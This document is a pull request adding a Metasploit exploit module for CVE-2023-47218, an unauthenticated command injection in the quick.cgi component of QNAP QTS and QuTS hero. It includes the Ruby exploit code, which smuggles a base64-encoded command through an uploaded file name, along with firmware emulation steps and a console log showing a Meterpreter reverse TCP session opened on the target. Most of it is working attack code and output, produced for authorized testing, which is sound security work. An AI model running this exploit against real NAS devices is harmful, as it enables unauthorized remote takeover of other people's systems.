### PR TITLE
Exploit module for CVE-2023-47218 in QNAP QTS and QuTH Hero

### DIFF
--- a/documentation/modules/exploit/linux/http/qnap_qts_rce_cve_2023_47218.md
+++ b/documentation/modules/exploit/linux/http/qnap_qts_rce_cve_2023_47218.md
@@ -1,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
+QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
+(NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.
+
+The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
+The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
+during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
+initialized, the quick.cgi component is disabled on the system.
+
+An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
+injection, allowing the attacker to execute arbitrary commands on the device.
+
+### Setup
+Vulnerable firmware can be downloaded from:
+[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
+In order to decrypt the firmware use the following script:
+[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
+
+Unzip the archive:
+```
+user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip 
+Archive:  TS-X64_20230926-5.1.2.2533.zip
+  inflating: TS-X64_20230926-5.1.2.2533.img  
+```
+
+Decrypt the firmware:
+```
+user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
+Signature check OK, model TS-X64, version 5.1.2
+Encrypted 1048576 of all 220239236 bytes
+[99% left]
+[99% left]
+[99% left]
+...snip
+[02% left]
+[00% left]
+[00% left]
+user@dev:~/qnap/$ ls
+qnap-qts-fw-cryptor.py  TS-X64_20230926-5.1.2.2533.img  TS-X64_20230926-5.1.2.2533.tgz  TS-X64_20230926-5.1.2.2533.zip
+```
+
+Recreate the root file system:
+```
+user@dev:~/qnap/$ mkdir firmware
+user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
+user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
+user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
+user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
+user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
+user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
+```
+
+To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
+```
+user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
+```
+
+Run _thttpd_ via QEMU:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ 
+sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080  -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
+```
+
+Verify the HTTP server is running:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
+tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1195417/./qemu-x86_ 
+```
+
+At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
+around the following issue: https://github.com/rapid7/mettle/issues/255.
+Ensure the binaries exist on your system:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
+/dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
+/dev/urandom
+```
+
+Create files the files:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
+```
+
+Mount the binaries:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind  /dev/random  dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind  /dev/urandom  dev/urandom
+```
+
+Drop to a shell via QEMU:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
+```
+
+Enable the component quick.cgi:
+```
+sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
+```
+
+Fix a linker issue with QEMU:
+```
+sh-3.2# rm /lib/libnl-3.so.200
+sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
+```
+
+Create this folder as it will be present in a NAS device containing a hard drive:
+```
+sh-3.2# mkdir /mnt/HDA_ROOT
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use linux/http/qnap_qts_rce_cve_2023_47218`
+1. Set the following options: `RHOST`, `RPORT`, `LHOST` and `FETCH_SRVPORT` if 8080 is already in use.
+1. Run the module
+1. Receive a Meterpreter session as the `admin` user.
+
+## Scenarios
+### TS-X64_20230926-5.1.2.2533 firmware emulated via qemu using the steps above.
+```
+msf6 > use linux/http/qnap_qts_rce_cve_2023_47218
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set lhost 172.16.199.158
+lhost => 172.16.199.158
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set fetch_srvport 8085
+fetch_srvport => 8085
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options
+
+Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.16.199.130   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasp
+                                       loit/basics/using-metasploit.html
+   RPORT    8080             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      mvcWDkBxSOK      no        Name to use on remote system when storing payload; cannot
+                                                  contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8085             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /mnt/update      yes       Remote writable dir to store payload; cannot contain space
+                                                  s.
+   LHOST               172.16.199.158   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run
+
+[*] Started reverse TCP handler on 172.16.199.158:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Sending stage (3045380 bytes) to 172.16.199.130
+[+] Deleted /mnt/update/RjzvVkLp
+[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9Sanp2VmtMcA==|base64 -d))"
+[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.130:40004) at 2024-02-15 12:20:04 -0900
+
+meterpreter > getuid
+Server username: admin
+meterpreter > sysinfo
+Computer     : 172.16.199.130
+OS           :  (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
+++ b/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -15,10 +16,23 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi',
         'Description' => %q{
+          There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
+          QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
+          (NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.
+
+          The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
+          The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
+          during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
+          initialized, the quick.cgi component is disabled on the system.
+
+          An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
+          injection, allowing the attacker to execute arbitrary commands on the device.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'sfewer-r7',
+          'sfewer-r7', # CVE discovery, MSF module, Rapid7 Blog
+          'Spencer McIntyre', # Assistance
+          'jheysel-r7' # Docs
         ],
         'References' => [
           ['CVE', '2023-47218'],
@@ -56,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed') unless res
 
-    return CheckCode::Safe if res.code == 404
+    return CheckCode::Safe('Received HTTP status code: 404. This indicates the device is not vulnerable.') if res.code == 404
 
     return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
 
@@ -76,42 +90,25 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Unknown
   end
 
-  # XXX: currently testing with these payloads:
-  # cmd/unix/reverse_bash
-  # cmd/linux/http/x64/meterpreter/reverse_tcp
-
   def exploit
     # XXX: the command injection has a limit of 127 characters, so we drop our payload to a file and then execute that file.
     bootstrap_file = Rex::Text.rand_text_alphanumeric(8)
 
-    mutex_file = Rex::Text.rand_text_alphanumeric(8)
-
     bootstrap_script = [
       '#!/bin/bash',
-      "cd #{datastore['FETCH_WRITABLE_DIR']}",
-      # Try to avoid multiple sessions by creation a directory (should be atomic) and then bailing out if the directory
-      # already exists.
-      "if ! mkdir #{mutex_file} 2>/dev/null; then exit; fi",
-      # XXX: Are files a better open than a directory?
-      # "if [[ -f #{mutex_file} ]]; then exit; fi",
-      # "touch #{mutex_file}",
-      'rm -f $0',
       payload.encoded
     ].join("\n")
 
     upload_file(bootstrap_file, bootstrap_script)
-
-    # XXX: delete the mutex_file (dir or file) when we get a session. (Msf::Exploit::FileDropper)
-
-    # XXX: the command will write a file to /mnt/update. As we control the contents, we could
-    # find all files with this content and delete it.
+    register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")
     execute_command("bash #{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")
   end
 
   def execute_command(cmd)
-    cmd_injection = Rex::Text.uri_encode("\"$($(echo -n #{Base64.strict_encode64(cmd)}|base64 -d))\"")
+    cmd_injection_filename = "\"$($(echo -n #{Base64.strict_encode64(cmd)}|base64 -d))\""
 
-    upload_file(cmd_injection, Rex::Text.rand_text_alphanumeric(8))
+    upload_file(Rex::Text.uri_encode(cmd_injection_filename), Rex::Text.rand_text_alphanumeric(8))
+    register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{cmd_injection_filename}")
   end
 
   def upload_file(file_name, file_data)

--- a/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
+++ b/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
@@ -1,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7',
+        ],
+        'References' => [
+          ['CVE', '2023-47218'],
+          ['URL', 'https://www.qnap.com/en/security-advisory/qsa-23-57'],
+          ['URL', 'https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed']
+        ],
+        'DisclosureDate' => '2024-02-13',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'FETCH_WRITABLE_DIR' => '/mnt/update'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/cgi-bin/quick/quick.cgi',
+      'vars_get' => {
+        'func' => Rex::Text.rand_text_alphanumeric(8)
+      }
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Safe if res.code == 404
+
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+
+    # This is the content data we get back from a vulnerable system (testing firmware TS-X64_20230926-5.1.2.2533):
+
+    # <?xml version="1.0" encoding="UTF-8"?>
+    # <Storage>
+    # <Result>failure</Result>
+    # <Errcode>801</Errcode>
+    # <Errmsg>
+    # No Parameter.
+    # </Errmsg>
+    # </Storage>
+
+    return Exploit::CheckCode::Detected if res.body.include? '<Result>failure</Result>'
+
+    CheckCode::Unknown
+  end
+
+  # XXX: currently testing with these payloads:
+  # cmd/unix/reverse_bash
+  # cmd/linux/http/x64/meterpreter/reverse_tcp
+
+  def exploit
+    # XXX: the command injection has a limit of 127 characters, so we drop our payload to a file and then execute that file.
+    bootstrap_file = Rex::Text.rand_text_alphanumeric(8)
+
+    mutex_file = Rex::Text.rand_text_alphanumeric(8)
+
+    bootstrap_script = [
+      '#!/bin/bash',
+      "cd #{datastore['FETCH_WRITABLE_DIR']}",
+      # Try to avoid multiple sessions by creation a directory (should be atomic) and then bailing out if the directory
+      # already exists.
+      "if ! mkdir #{mutex_file} 2>/dev/null; then exit; fi",
+      # XXX: Are files a better open than a directory?
+      # "if [[ -f #{mutex_file} ]]; then exit; fi",
+      # "touch #{mutex_file}",
+      'rm -f $0',
+      payload.encoded
+    ].join("\n")
+
+    upload_file(bootstrap_file, bootstrap_script)
+
+    # XXX: delete the mutex_file (dir or file) when we get a session. (Msf::Exploit::FileDropper)
+
+    # XXX: the command will write a file to /mnt/update. As we control the contents, we could
+    # find all files with this content and delete it.
+    execute_command("bash #{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")
+  end
+
+  def execute_command(cmd)
+    cmd_injection = Rex::Text.uri_encode("\"$($(echo -n #{Base64.strict_encode64(cmd)}|base64 -d))\"")
+
+    upload_file(cmd_injection, Rex::Text.rand_text_alphanumeric(8))
+  end
+
+  def upload_file(file_name, file_data)
+    if file_name.length > 127
+      fail_with(Failure::BadConfig, "The upload file name is too long (#{file_name.length}), must be < 128 bytes.")
+    end
+
+    boundary = Rex::Text.rand_text_alphanumeric(8)
+
+    # XXX: use Rex::MIME::Message.new
+    txt = "--#{boundary}\r\n"
+    txt << "Content-Disposition: form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"\r\n"
+    txt << "Content-Type: text/plain\r\n"
+    txt << "\r\n"
+    txt << "#{file_data}\r\n"
+    txt << "--#{boundary}--\r\n"
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/cgi-bin/quick/quick.cgi',
+      'vars_get' => {
+        'func' => 'switch_os',
+        'todo' => 'uploaf_firmware_image'
+      },
+      'headers' => {
+        'User-Agent' => 'Mozilla Macintosh'
+      },
+      'ctype' => "multipart/form-data;boundary=\"#{boundary}\"",
+      'data' => txt
+    )
+  end
+end

--- a/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
+++ b/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb
@@ -119,15 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, "The upload file name is too long (#{file_name.length}), must be < 128 bytes.")
     end
 
-    boundary = Rex::Text.rand_text_alphanumeric(8)
-
-    # XXX: use Rex::MIME::Message.new
-    txt = "--#{boundary}\r\n"
-    txt << "Content-Disposition: form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"\r\n"
-    txt << "Content-Type: text/plain\r\n"
-    txt << "\r\n"
-    txt << "#{file_data}\r\n"
-    txt << "--#{boundary}--\r\n"
+    data = Rex::MIME::Message.new
+    data.add_part(file_data, 'text/plain', 'binary', "form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"")
 
     send_request_cgi(
       'method' => 'POST',
@@ -139,8 +132,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'User-Agent' => 'Mozilla Macintosh'
       },
-      'ctype' => "multipart/form-data;boundary=\"#{boundary}\"",
-      'data' => txt
+      'ctype' => "multipart/form-data;boundary=\"#{data.bound}\"",
+      'data' => data.to_s
     )
   end
 end


### PR DESCRIPTION
This pull request is for a module targeting CVE-2023-47218, an unauthenticated command injection vuln affecting QNAP QTS and QuTH Hero.

Our [Rapid7 disclosure](https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/) has an analysis of the vuln as well as a standalone PoC. During analysis I was emulating the firmware, instructions on how to do this are in the blog post.

# Verification Steps

1. Start msfconsole
1. Do: `use linux/http/qnap_qts_rce_cve_2023_47218`
1. Set the following options: `RHOST`, `RPORT`, `LHOST` and `FETCH_SRVPORT` if 8080 is already in use.
1. Run the module
1. Receive a Meterpreter session as the `admin` user.